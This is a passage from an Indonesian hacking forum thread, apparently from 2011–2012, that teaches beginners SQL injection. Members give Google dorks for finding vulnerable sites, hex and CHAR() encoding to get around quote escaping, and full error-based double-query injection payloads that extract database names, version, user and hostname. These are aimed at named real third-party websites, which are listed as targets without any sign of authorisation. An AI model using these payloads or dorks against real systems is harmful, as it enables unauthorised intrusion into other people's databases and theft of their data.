Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-25-2013, 05:42 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Web Hacking v
1 2 3 4 5 ... 55 Next »

[Tutor] SQL Injection For Newbie (Share Di Mari)

Home General Computer Multimedia Business Lounge

Pages (7): « Previous 1 2 3 4 5 ... 7 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor SQL Injection For Newbie (Share Di Mari)
12-29-2011, 11:32 PM
Post: #11
ketek Offline
bocah ingusan
*******
Administrators
Posts: 2,178
Joined: Jan 2010
Reputation: 382
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 10:00 PM)eidelweiss Wrote:  om bisa di jelasin nggak pada bagian ini

Quote:sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :
Code:
user_account = 0x757365725f6163636f756e74



kenapa harus di ubah or di hex terlebih dahulu ? kenapa gk lgsg aja atau klw pun harus di encrpyt kenapa harus dalam bentuk hexa kenapa nggak md5 base64 r00t13 or sha-1 or yg lain ?

malu

Code:
table_name= 0x757365725f6163636f756e74--

ane bantu jawab ya..
disitu pake hex, mungkin karena tanda quote (') di escape menjadi \'
jadi kita tidak bisa gunakan sebagai nama table
kalau seandainya tidak di escape, maka kita bisa langsung gunakan
Code:
table_name = 'user_account'--

selain dirubah ke bentuk hex, kita bisa juga gunakan fungsi CHAR()
contoh
Code:
table_name=char(117,115,101,114,95,97,99,99,111,117,110,116)--
Find all posts by this user
Quote this message in a reply
 Reputed by :  eidelweiss(+1)
12-29-2011, 11:57 PM
Post: #12
cangcimen Offline
./Devilz Advisor
Posts: 539
Joined: Sep 2010
Reputation: 42
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 11:32 PM)ketek Wrote:  ane bantu jawab ya..
disitu pake hex, mungkin karena tanda quote (') di escape menjadi \'
jadi kita tidak bisa gunakan sebagai nama table
kalau seandainya tidak di escape, maka kita bisa langsung gunakan
Code:
table_name = 'user_account'--

selain dirubah ke bentuk hex, kita bisa juga gunakan fungsi CHAR()
contoh
Code:
table_name=char(117,115,101,114,95,97,99,99,111,117,110,116)--

makasih banyak om ketek udah bantu jawab,, ane lagi pusing ini buat ngasih jawaban dari om edelwies maklum newbie galau prustasi prustasi
tapi nnti ane usahakan jawab om ketawa sekarang lagi belajar
Find all posts by this user
Quote this message in a reply
12-30-2011, 01:51 AM
Post: #13
Caster.fm Offline
^^gak selalu hujan^^
Posts: 398
Joined: Nov 2011
Reputation: 58
RE: SQL Injection For Newbie (Share Di Mari)
Code:
www.canseburesort.co.id
nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?

Code:
www.canseburesort.co.id/?id_page=6&id_berita=15
ane msih bingung gmna bsa samapai angka 15 dan bukan 1,2 ,3 atau lainnya ?

maklum pemula malu
Visit this user's website Find all posts by this user
Quote this message in a reply
12-30-2011, 04:45 AM
Post: #14
tabun Offline
./Junk3r C4d3t
Posts: 1,796
Joined: Dec 2011
Reputation: 33
RE: SQL Injection For Newbie (Share Di Mari)
(12-30-2011 01:51 AM)mendung Wrote:  
Code:
www.canseburesort.co.id
nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?

Code:
www.canseburesort.co.id/?id_page=6&id_berita=15
ane msih bingung gmna bsa samapai angka 15 dan bukan 1,2 ,3 atau lainnya ?

maklum pemula malu

klo 15 itu id dari beritanya omz.. piss
1 = berita 1
2 = berita 2
dst.. ngakak
Find all posts by this user
Quote this message in a reply
12-30-2011, 07:19 AM
Post: #15
cangcimen Offline
./Devilz Advisor
Posts: 539
Joined: Sep 2010
Reputation: 42
RE: SQL Injection For Newbie (Share Di Mari)
(12-30-2011 01:51 AM)mendung Wrote:  
Code:
www.canseburesort.co.id
nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?

Code:
www.canseburesort.co.id/?id_page=6&id_berita=15
ane msih bingung gmna bsa samapai angka 15 dan bukan 1,2 ,3 atau lainnya ?

maklum pemula malu

ane dapet target ini karena temen ane ada yang kerja disana ketawa
sebenernya bisa juga pencarian informasi web pake google dork (kalo ngga salah) ketawa kalo emang pertanyaan dari ente
Code:
nyarinya gimana ? sampai ketemu ini web dan bukan yang lain ?
contohnya
Code:
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()

15 = id_berita (itu artinya nomer halaman berita om, dari websitenya ketawa) dan kebetulan ada vuln di sana
Find all posts by this user
Quote this message in a reply
01-01-2012, 10:43 PM
Post: #16
CyberKaze Offline
./Devilz Advisor
Posts: 869
Joined: Jul 2011
Reputation: 13
RE: SQL Injection For Newbie (Share Di Mari)
om ketek , eidelweiss , cangcimen , tabun

kalo misal yg keluar

Quote:Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dhanoad/public_html/newscategories/index.php on line 346

contohnya di web :

http://www.gabbr.com/thread.php?id=88
http://svitmoto.com/news.php?id=16
http://www.stmik-time.ac.id/
http://aritaglobal.co.id/products.php?idcat=1

itu digimanain omz ? kalo dikasih single mark (') atau perintah order by juga yg keluar sama aja omz.

1 lagi omz di web ini http://www.capsweb.org/content.php?id=57
kalo di kasih order by 17-- itu kan "Unknown column '17' in 'order clause'"

nah berarti jadinya :
http://www.capsweb.org/content.php?id=57 order by 16--

nah nanti nya pas perintah union all select itu angkanya gimana ?
apakah 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 atau 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 atau gimana ? soalnya ane coba yg kya gitu ga keluar apa" om ..

mohon penjelasannya peace
Visit this user's website Find all posts by this user
Quote this message in a reply
01-02-2012, 02:20 AM
Post: #17
cangcimen Offline
./Devilz Advisor
Posts: 539
Joined: Sep 2010
Reputation: 42
RE: SQL Injection For Newbie (Share Di Mari)
(01-01-2012 10:43 PM)CyberKaze Wrote:  
Quote:Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dhanoad/public_html/newscategories/index.php on line 346

contohnya di web :

http://www.gabbr.com/thread.php?id=88
http://svitmoto.com/news.php?id=16
http://www.stmik-time.ac.id/
http://aritaglobal.co.id/products.php?idcat=1

itu digimanain omz ? kalo dikasih single mark (') atau perintah order by juga yg keluar sama aja omz.

1 lagi omz di web ini http://www.capsweb.org/content.php?id=57
kalo di kasih order by 17-- itu kan "Unknown column '17' in 'order clause'"

nah berarti jadinya :
http://www.capsweb.org/content.php?id=57 order by 16--

nah nanti nya pas perintah union all select itu angkanya gimana ?
apakah 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 atau 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 atau gimana ? soalnya ane coba yg kya gitu ga keluar apa" om ..

mohon penjelasannya peace

cara ente udah bener gan, sebenernya website yang agan maksud ini bisa kita inject dengan double query
kenapa demikan?... karena ketika ane coba dengan
Code:
id=57 and 1=1 ------->true
id=57 and 1=2 ---------> false
ini asumsi ane pertama dan ternyata ane hoki ketawa mungkin ini bisa dibilang error based (tapi ane ngga yakin, mungkin momod yang bisa kasih tau)
kenapa ane berfikir itu vuln terhadap double query, karena ane pernah dapet yang kaya gituan ketawa
sekarang coba kita cermati baik2 query dibawah
Code:
id=57 and(select 1 FROM(select count(*),concat((select (select concat([color=#FF4500]database[/color]())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
[Image: zv4vmx.jpg]
hasil dari query tersebut adalah untuk melihat nama database! dan ternyata nama database tidak keluar, karena jumlah dari database lebih dari satu (kalo salah tolong di bilangin ya om).
sekarang coba kita ganti database jadi seperti berikut:
Code:
version()
user()
@@hostname
datadir()

maka berturut-turut akan jadi seperti gambar dibawah ini
[Image: 10h4lc6.jpg]
[Image: 2mfai6b.jpg]
[Image: 34t5ncz.jpg]
[Image: 10wo5ya.jpg]
okeh lanjut, di atas ane udah singgung tentang database, sekarang kita pengen cek ada berapa nama database sih?ketawa
Code:
id=57 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables GROUP BY x)a)
[Image: fdxehi.jpg]
ngakak
kita dapet pesan
Code:
Duplicate entry '~'17'~1' for key 'group_key'
itu artinya ada 17 nama database ketawa

sekarang kita pengen tau nama databasenya apa aja:
Code:
and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT [color=#FF4500]0[/color],1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
ini kita lakukan satu persatu, di atas angka 0 dan akan keluar seperti berikut
[Image: 6h7yir.jpg]
Code:
Duplicate entry '~'information_schema'~1' for key 'group_key'
itu database yang pertama, untuk melihat database selanjutnya tinggal ente ganti aja yang 0 menjadi 1 atau 2 s/d 17

demikian dari apa yang bisa ane bantu om,,
ente bisa cari nama tabel dan nama kolom sendiri, mungkin ente bisa explore lagi dari contoh ane yang dia atas.. piss

maaf kalo penjelasan ane ngawur atau ngaco,, piss (newbie)
referensi
Code:
[url]http://hacksafe.blogspot.com/2010/10/quick-dirty-mysql-error-based-blind.html[/url]
Find all posts by this user
Quote this message in a reply
 Reputed by :  CyberKaze(+1)
01-03-2012, 03:50 PM
Post: #18
nenjun Offline
./Devilz 1st Cadet
Posts: 1
Joined: Jan 2012
Reputation: 0
RE: SQL Injection For Newbie (Share Di Mari)
kalau pake hp gimana itu...pake opmin?..ko ga bisa bisa...
aku bingung masta..
Find all posts by this user
Quote this message in a reply
01-03-2012, 06:39 PM
Post: #19
g4t4n4 Offline
./Devilz Officer
Posts: 145
Joined: Dec 2011
Reputation: 4
RE: SQL Injection For Newbie (Share Di Mari)
ane pake hp teruz prustasi
Visit this user's website Find all posts by this user
Quote this message in a reply
01-05-2012, 12:17 PM
Post: #20
cangcimen Offline
./Devilz Advisor
Posts: 539
Joined: Sep 2010
Reputation: 42
RE: SQL Injection For Newbie (Share Di Mari)
(01-03-2012 03:50 PM)nenjun Wrote:  kalau pake hp gimana itu...pake opmin?..ko ga bisa bisa...
aku bingung masta..

itu bisa kali om,,
emang handphone ente udah suport sama opmin?? piss
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (7): « Previous 1 2 3 4 5 ... 7 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Solved] sql injection belajarcarding 11 247 05-10-2013 11:22 AM
Last Post: -=[A][R][I]=-
  [share] kumpulan shell indo dan top_100_shell 777r 25 1,145 04-21-2013 02:09 PM
Last Post: I'van
  [Tutor] SQL injection di globaltv.co.id Exsposed wenkhairu 36 2,326 04-20-2013 03:27 PM
Last Post: fachrycanthropuS
Thumbs Up [Tutor] Remote Command Excute Ala newbie Regel 6 223 03-27-2013 04:35 PM
Last Post: abuabu_hat10
Thumbs Down [Tutor] Pepesan palsu :ngakak (newbie abis lah pokoknya) beg3nk newb1e 18 725 03-25-2013 10:21 AM
Last Post: lanionk
  SQL Injection "detail_prod" server luxembourg [dc]zombierss[dc] 30 469 03-17-2013 11:41 AM
Last Post: Rifaldi238
  [Share] SQLi Scanner - di Jamin Maknyuss RizaL.eN 11 489 03-09-2013 03:13 PM
Last Post: jawaklagi
  List Cheat Blind SQL Injection (Mysql) devilz666 7 348 03-09-2013 02:23 PM
Last Post: jawaklagi
  [Tutor] Sql Injection into outfile [tambahan] KotoM 23 838 02-23-2013 10:52 PM
Last Post: soulheaven
  Sql-map 0.9 Mysql Injection Guide wenkhairu 29 1,871 12-28-2012 01:56 PM
Last Post: bazrezs

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-25-2013, 05:42 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE